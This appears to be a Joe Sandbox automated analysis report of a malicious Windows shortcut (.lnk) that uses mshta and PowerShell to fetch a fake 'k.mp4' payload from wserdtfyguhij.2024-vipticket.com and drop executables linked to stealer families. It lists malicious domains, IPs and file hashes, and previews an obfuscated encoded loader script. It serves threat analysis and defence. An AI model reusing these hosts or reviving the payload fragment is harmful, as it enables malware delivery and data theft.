http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4ass	mshta.exe, 00000005.00000003.2244463928.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2238526594.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2244758933.000001FCD8536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2250799869.000001FCD8538000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://line.naver.jp0	powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe.7.dr	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000007.00000002.2175697500.0000019833685000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4OOC:	mshta.exe, 00000005.00000003.2240522066.000001F4D581D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2218734138.00000198427D2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	powershell.exe, 00000007.00000002.2175697500.0000019834412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832BED000.00000004.00000800.00020000.00000000.sdmp, IntroductoryTunes.exe, 00000009.00000000.2169554498.0000000000409000.00000002.00000001.01000000.0000000F.sdmp, IntroductoryTunes.exe, 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmp, IntroductoryTunes.exe.7.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2175697500.0000019832988000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4~	powershell.exe, 00000004.00000002.2082612809.00000171EEF50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2248744845.000001F4D57E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wserdtfyguhij.2024-vipticket.com	powershell.exe, 00000007.00000002.2175697500.00000198343EE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod/C:	edb.log.6.dr	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4https://	mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4$global:?	powershell.exe	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/IntroductoryT	powershell.exe, 00000007.00000002.2175697500.0000019834085000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4(	mshta.exe, 00000005.00000002.2251538246.000001FCDCD10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4https://wserdtfyguhij.2024-vipticket.com/k.mp4)	mshta.exe, 00000005.00000003.2246280426.000001FCDC5DD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2086496736.000001DE939FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2079166575.000001718005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2079166575.0000017180049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175697500.0000019832761000.00000004.00000800.00020000.00000000.sdmp	false		high
https://wserdtfyguhij.2024-vipticket.com/k.mp4...(J	mshta.exe, 00000005.00000002.2250550367.000001FCD84AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/	mshta.exe, 00000005.00000003.2238124041.000001F4D5891000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4%	powershell.exe, 00000004.00000002.2082048730.00000171ED550000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wserdtfyguhij.2024-vipticket.com/k.mp4#	mshta.exe, 00000005.00000002.2248825747.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2240522066.000001F4D5855000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.10.2	bendydully.click	United States		13335	CLOUDFLARENETUS	true
172.67.219.101	wserdtfyguhij.2024-vipticket.com	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570112
Start date and time:	2024-12-06 15:24:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	JSWunwO4rS.lnk renamed because original name is a hash value
Original Sample Name:	624101f6b4285e2425c8851c2350d787.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@35/34@3/3
EGA Information:	Successful, ratio: 20%
HCA Information:	Successful, ratio: 100% Number of executed functions: 37 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 1088 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 6660 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7160 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: JSWunwO4rS.lnk

Simulations

Behavior and APIs

Time	Type	Description
09:25:42	API Interceptor	2x Sleep call for process: svchost.exe modified
09:25:43	API Interceptor	45x Sleep call for process: powershell.exe modified
09:25:48	API Interceptor	1x Sleep call for process: IntroductoryTunes.exe modified
09:25:53	API Interceptor	796x Sleep call for process: Concerts.com modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	IErMYVWrv9.exe	Get hash	malicious	Python Stealer, Luna Grabber, Luna Logger	Browse	162.159.135.232
	7p5nITtglJ.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjshdkfgjsdg.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	https://wdurl.ru/4mA#yml4dckta8ps5sz	Get hash	malicious	Unknown	Browse	104.21.74.88
	jew.x86.elf	Get hash	malicious	Unknown	Browse	1.4.26.77
	jew.mpsl.elf	Get hash	malicious	Unknown	Browse	104.23.193.103
	https://t.ly/alBFX	Get hash	malicious	Unknown	Browse	104.20.7.133
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.153.96
	#U25b6#Ufe0fPlayVoiceMessage9266.eml	Get hash	malicious	Unknown	Browse	104.18.95.41
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.165.166
CLOUDFLARENETUS	IErMYVWrv9.exe	Get hash	malicious	Python Stealer, Luna Grabber, Luna Logger	Browse	162.159.135.232
	7p5nITtglJ.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	kjshdkfgjsdg.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	https://wdurl.ru/4mA#yml4dckta8ps5sz	Get hash	malicious	Unknown	Browse	104.21.74.88
	jew.x86.elf	Get hash	malicious	Unknown	Browse	1.4.26.77
	jew.mpsl.elf	Get hash	malicious	Unknown	Browse	104.23.193.103
	https://t.ly/alBFX	Get hash	malicious	Unknown	Browse	104.20.7.133
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.153.96
	#U25b6#Ufe0fPlayVoiceMessage9266.eml	Get hash	malicious	Unknown	Browse	104.18.95.41
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	172.67.165.166

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	7p5nITtglJ.lnk	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.67.219.101
	kjshdkfgjsdg.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.67.219.101
	https://t.ly/alBFX	Get hash	malicious	Unknown	Browse	172.67.219.101
	QD40FIJ8QK.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101
	TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.219.101
	AS6xKJzYJT.exe	Get hash	malicious	Python Stealer, XenoRAT	Browse	172.67.219.101
	yG53aU3gGm.exe	Get hash	malicious	Unknown	Browse	172.67.219.101
	5eAjHgPxj2.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	172.67.219.101
	2zirzlMVqX.bat	Get hash	malicious	Xmrig	Browse	172.67.219.101
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	104.21.10.2
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	Software.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	Loader.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.10.2
	3fo6GN17jm.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Nymaim, Stealc	Browse	104.21.10.2
	jW3NEKvxH1.exe	Get hash	malicious	Remcos, DBatLoader	Browse	104.21.10.2
37f463bf4616ecd445d4a1937da06e19	apilibx64.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.219.101
	Fortexternal.exe	Get hash	malicious	Unknown	Browse	172.67.219.101
	Setup.msi	Get hash	malicious	Unknown	Browse	172.67.219.101
	Document_PDF.vbs	Get hash	malicious	FormBook	Browse	172.67.219.101
	Pr9cqW75nY.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101
	G3vWD786PN.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101
	hTXtTJXdLt.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101
	fqufh5EOJr.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101
	NGVW0QXQSn.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101
	EU2Yvx0L9q.lnk	Get hash	malicious	Unknown	Browse	172.67.219.101

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\136140\Concerts.com	Yn13dTQdcW.exe	Get hash	malicious	Vidar	Browse
	DM6vAAgoCw.exe	Get hash	malicious	Orcus, Xmrig	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	Setup.exe	Get hash	malicious	Vidar	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	ton.exe	Get hash	malicious	Vidar	Browse
	File.exe	Get hash	malicious	Orcus, Xmrig	Browse
	Full_Setup_v24.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8307295958603687
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugH:gJjJGtpTq2yv1AuNZRY3diu8iBVqFd
MD5:	F9367222E011FC23E1FD96F1649EB95C
SHA1:	FD37FDBDD836EDC2EED349009A2319A08A3F5020
SHA-256:	D0EDAFEF922D9DD22F5B7BAEF37F819A3E7F71D356881EF986F6AC858A718181
SHA-512:	619EAFE49BC85E11CE4B549ECD19F9725529CBE483F1DBFEFDD7B0A2769F219EDC3EF71C88A749B7CEA7F807A03503459A56B2B1821DFCE6B775BEB6B9F56502
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x37716418, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.658596171534321
Encrypted:	false
SSDEEP:	1536:pSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:paza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	0221ECEC5799C9A24C97498386687268
SHA1:	A5DDE498647609F2D91AFC0FC6C75039C32D94A0
SHA-256:	99FD167277415AA426998EB6D0E3D4623C4E72326F4FF44A5D0E3A9692D69EA5
SHA-512:	7B88025B3C76BCFA0B125A8B0F5719C41815F485F144E307207C1DB7AD30C7FB0115E791FBFAA8E99260820ED6ED28FB2C430E6C3C849681D61E92D84AC1BB73
Malicious:	false
Preview:	7qd.... ...............X\...;...{......................0.z..........{......\|!.h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.........................................\|!.................ko.`*....\|!..........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08090824287484144
Encrypted:	false
SSDEEP:	3:ykEYe46V6hbHGuAJkhvekl1AFP8Z6h/XollrekGltll/SPj:yDzPKbHrxlM8ZK/IJe3l
MD5:	AD0CFFA32FB5A7D2B1AE600B617E5E63
SHA1:	265FF5012FE079E15F2F36F851FAD14A1B7FDEC4
SHA-256:	5B8D15B32F53CD5B585AFD9D16916F8C1D82582640176DC5F5DA866BE9745323
SHA-512:	67CB460793D9A2B69995921CBC7B0713E0BAA163753FC7E7BF5E9CE8BBB26EAA722AAC443C3E042396D3CE80413270D3CAD40882375B1384FF67BBD9092017F8
Malicious:	false
Preview:	..-......................................;...{......\|!......{...............{.......{...XL......{..................ko.`....\|!.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k[1].mp4

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	332547
Entropy (8bit):	2.456632137612192
Encrypted:	false
SSDEEP:	1536:skefvcq4+iUZ0PdW5d9rJVgSK7Q5QvQqQE48KQsQ5E71:s7f0q4trAdXqSRuInPyte71
MD5:	9EE7DE5521C2FFC393E53A924CBC6DBE
SHA1:	7945E4DAE6AFD0FC527D226ED55F2A860E47C8C8
SHA-256:	A4FBDBF5EE58DF565F269F357A8A4360F56604792575995F7A262471E7D92824
SHA-512:	B38E2C6D6B0F909AB32130B5A29C7459450CFC8D624582A754C14A9ADC56EEB423D49F02DFE89B2B18DC66AE08403AC035EDACD7D1CC15CA5D0524BC577E5C37
Malicious:	false
Preview:	66n75G6eW63W74K69o6fW6eh20Q77q77W6dv56S73z28Y76n63w6eD70g29s7ba76J61f72i20b63q6cj62s62L57y4bz3dL20z27W27h3bm66G6fP72Q20m28z76c61J72g20k61v57E47v71E58z20t3dI20E30E3bo61d57a47n71v58U20E3ce20V76S63q6eK70v2ew6cS65l6eh67g74m68u3bs20y61z57z47y71f58m2bo2bn29L7bF76q61H72u20h4dD6bL78T50U20w3dh20U53G74r72p69Z6ez67H2ed66S72S6fM6dW43J68M61q72e43b6fo64P65h28Q76q63J6eN70z5bD61B57O47O71Z58N5dM20p2dM20Y39r35I31J29Y3bf63e6cK62V62t57s4bU20x3di20q63Z6ck62e62E57P4bQ20e2bw20e4dp6bW78y50t7dO72s65E74A75h72x6en20z63V6cR62P62j57D4bF7dV3bQ76U61f72G20T63X6cp62p62j57H4ba20v3dt20u77e77U6dC56h73l28w5bc31o30s36m33A2cu31r30D36S32O2cV31L30L37I30g2cJ31K30P35e32V2cZ31C30V36t35G2cB31u30F36r36x2cN31C30R35J35s2cc31c30s35G32Y2cg31l30X35U39l2cO31k30k35O39U2cK39n39C37P2cW31Z30T35y32g2cy31A30m37M31U2cB31T30t35B32Q2cE39g38R33J2cG39o39o36f2cA31H30s37Q30J2cq39W38n33a2cz31B30n30T30J2cd39M38H33Y2cu39Y39D36T2cS31U30j35U32K2cn31s30d36w33b2ci39u38S33r2co31h30q33v36p2cg31b30T36s31O2cw31u30D36E35B2ch31u30P35b32h2co31X30h36o36g2ci31u30w3

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\136140\Concerts.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Yn13dTQdcW.exe, Detection: malicious, Browse Filename: DM6vAAgoCw.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: xoJxSAotVM.exe, Detection: malicious, Browse Filename: ton.exe, Detection: malicious, Browse Filename: ton.exe, Detection: malicious, Browse Filename: File.exe, Detection: malicious, Browse Filename: Full_Setup_v24.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\136140\d

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	438234
Entropy (8bit):	7.999566823466759
Encrypted:	true
SSDEEP:	6144:ek038AePwodWf4neTgXYPuum1YKradBjazx63CGM4TDhePTMWDs4b+aBi8mki7Y1:erPyM49Ima463Cmha4wxg8mjU1
MD5:	82D8D1555ECFC469718D45619C906176
SHA1:	DAE453D0399C7FF19F5FE3D5EF6031285BF1C7FA
SHA-256:	48D09398B5691816268843FEEC9912B8F524E5BBE8FFF2FF175EEC237C9D6B73
SHA-512:	C73516FD02A8586602B884C6A6211B5F29E05CC84226002F2B83D1FAF3D28387935EC65F08103B5C9144FCE6FC7FEFEBCDA36BBA752C9A7BB66E50E67EAE5220
Malicious:	false
Preview:	9X...n....\|...1.H......0...d^L.E%.x...u....C.Cm...[Q.)w..=...J5...FS'~...l.....hc...Mx..x...P....&b...'m..Qd..#_"xE......(.R.........5uNrB'.:.j..g..;,..l.....P}..Y...{....{g\..C."..T..V..3.S.%J...N"XH^(u.=.5.2=..[=fM.._j.k.c.V.z..d!A.T\..Po#.E. ..{.6........\.t...n./...jK.....}..^S=a...h...l..I$q(.Y....LU:Z....,!C.F.y..G....B.U...a).vvzS..s.o....+.......n.../.$\|.....,...O..o..=Oa.........P;....m...\Y...[...............l..t...\|@.Sa.uy..[.3...a.... ...V.......<....@..c....o..s\..s.p..G$..k....2:.LG.X..7.&.F.T%...1X....&..4.E..Z.n.q....Q.!.@4.c....C..+...p.ok.........Mj.....{....sOF.....&..T.0MB..~...V"......[k.r.W.y...&.a......!.f...$.j..W.2K.m...T.K...w.gP.X^.....2+...m........"...=Ydv]..s...]...tF..jm...utU6....ot..U..f...;.A...{}..@...)yH}A..w.E.:.q.f..:..)..Dm&.3...,g..q...?....@.N.....e..5\|.P.....U...?@vS........Ymq.....;X?s<.A<&2j...g[7BN.\.x.x/.g@.xT.).....,.\..BI&u...S... .a..1..v.._..[5,!<.'....Ca.$..........a}.+.J...'.H..9....y.

C:\Users\user\AppData\Local\Temp\Contents

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	7.99665912851967
Encrypted:	true
SSDEEP:	1536:vyJDxBZ9m93gpZiSLWeYZOLO9IgoaCEpEfUGx4UWH1cx:v4tBZ9mlSLBYkLOpoaCEOf74jix
MD5:	C8415EB88413595248B987268B732131
SHA1:	CE66AB613A2251654005709525E1D9C63341167D
SHA-256:	820D25AB1FB7B715165F5132CA6F761E2F43BB88E94CB892C5CD5DE6EEA12CB6
SHA-512:	DCEFD9A6F1531FBCDC148E6FA506D33ED698CCBC05BD49EE6DC8984C1222CD331FC2A4CC373525F450A19D8310C7519D0AA880886371EABA398490B735F12EE1
Malicious:	false
Preview:	....:\|NS..l...vy.........se.dl..v......B...E.......:.T]..7ypR.$7..#YSQ.0..!z....RN...../.r....U.1.'.`.alht3<bH.!...c...-.'Fyi..W..w..k.C7.E...q).z.T..Q.. .8...z..Y.,.9.........3....G../.YJ/J.5...6../.n...1..u(PXL9..h.f.s...u..(..A....g..^U.U.'u.......c.K.....f..Z~..t.<...}..r.[...........Ob.........j....<.........b....`:...Gv..h.l6..S.a.B......>f.v./....M..1J.R.Ex.....]b3.>.k.$...&..u.A..dq..OB..V.rG./...uu...r..\|....f..ML.w.[..t....].=7..C..~ r.f.W..N....\...J.P..D`&4.8"...K.E...~.L./.S.e......e.u....OR......@.6.G........4..(.................{.7d@..W...G.Z...P.......1...g...ae..\|n.;.b.8..Z..?#..8sh....E.C7..l~)SFvp.!..... ...=I..s..D...._..f.k...e.0.Ip......M..3 ..2.P.Z...>.X.V......iZ..>..r?..Bt..m..7@..~ZA..J9.@........q..+mG...V..%.....[.aV.]/@...P"..Y......n~.....u....P.f..3.e...<....C.V.\+...a.p6..Z;....Y......G.o.Cv...M..,..6v.C. .xZ...+Ve...g...........}:~..'.Y......S..iF"....H..1.o.!..xK.!Z.rM.7..x.*.......,..\|U.).

C:\Users\user\AppData\Local\Temp\Courtesy

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	6.5239129261321365
Encrypted:	false
SSDEEP:	1536:LUshVkf88nfNk4qqdGYynTDYL7Q+mr9R2VgjGpS2EhkV:LzAfaBaGdDqeb2Xo2IkV
MD5:	510AD017E1734053EF3E25C2515B3E73
SHA1:	3DBB89B06E15A72C0DD82AA23D961B924A0E93C7
SHA-256:	0A678C293EA18F3E7085729023ADDC0182C5546AAC4AEA7BC29D71EB5BFAAFEA
SHA-512:	4E7B29C6B7961056D24B6A53ABC04C1C34ACB72ADF7D2CB8DC3EB570BE264225D309BEE94BD4DFE88C4C482D23EB249921E9681BF6FE025DDBABC7C5C4E87E1D
Malicious:	false
Preview:	..3.W.}.f..J...O..L....u`.~..u).N..V..........H...A.N.......H....A..F..'...G.............H....4........H....F...L........H.....L.....H.....u._...^]...VWj...3..W......uKP^P...H......u<j.^j....7......u+Sj)^j....%........;.u..s)....j........;.t.[..._..^.SV..3.9^.u..F$h..I.P.....F.YY..u.j.X......^.9^.u,..,...h..K.P.w....F YY..u.9^.t..v.....Yj...^ .F..^.P..^...8.....<.....@.....H.....L.....D.....\.....`..........t!9^.t..v..R...Y9^ t..v .D...Y3.@.[W...........t 9^.t..v..#...Y9^ t..v .....Y...,...)..........9^.t..v......Y9^ t..v .....Y3._^[.U..QQSVW..._..].....j...........u*j.......8.....4..............8.....<....[j...............8...+.M...t<...8...H..4..........E...%....C........8.....<....E...u.]....6......b.....D....u.9.8.....H......6...3._^[..].j.X..V..4.....t.P...Y..X.....t.P...Y..T...^..t.P...Y...L.V..W=....v3.%..L....P.....t(.N.3.k.d.v.PQ.v.......u..D......@...L._^.U..QQV..~..u..F..F.j.P.E.P..}........v..E.j.j.P.........M...E..F........E....E........E......

C:\Users\user\AppData\Local\Temp\Digital

Download File

Process:	C:\Users\user\AppData\Roaming\IntroductoryTunes.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	6.228441138778475
Encrypted:	false
SSDEEP:	1536:ZGDox2S3hPt8gNpkU5uG3xYwBMK1zN90psu0ni:y5SB7BJBzLZi
MD5:	0EA07E2E531400CDC0D0CE5CA91ADC9E
SHA1:	F10E22D44283A6357AC5F409FE306EEA540DF46D
SHA-256:	410B092CCD349005C98835B1B3DB7573D2ECA67C168A15EDFB814BEA69B16BE3
SHA-512:	B5A5222F54E1D2CB997C700C30AFBD69941863A0DB5D237FE89A518D71D6B9AF01B9D2CD7EB9BF53AD55FA8AD6B4733D186598316A821B49AE706420DABED2E5
Malicious:	false
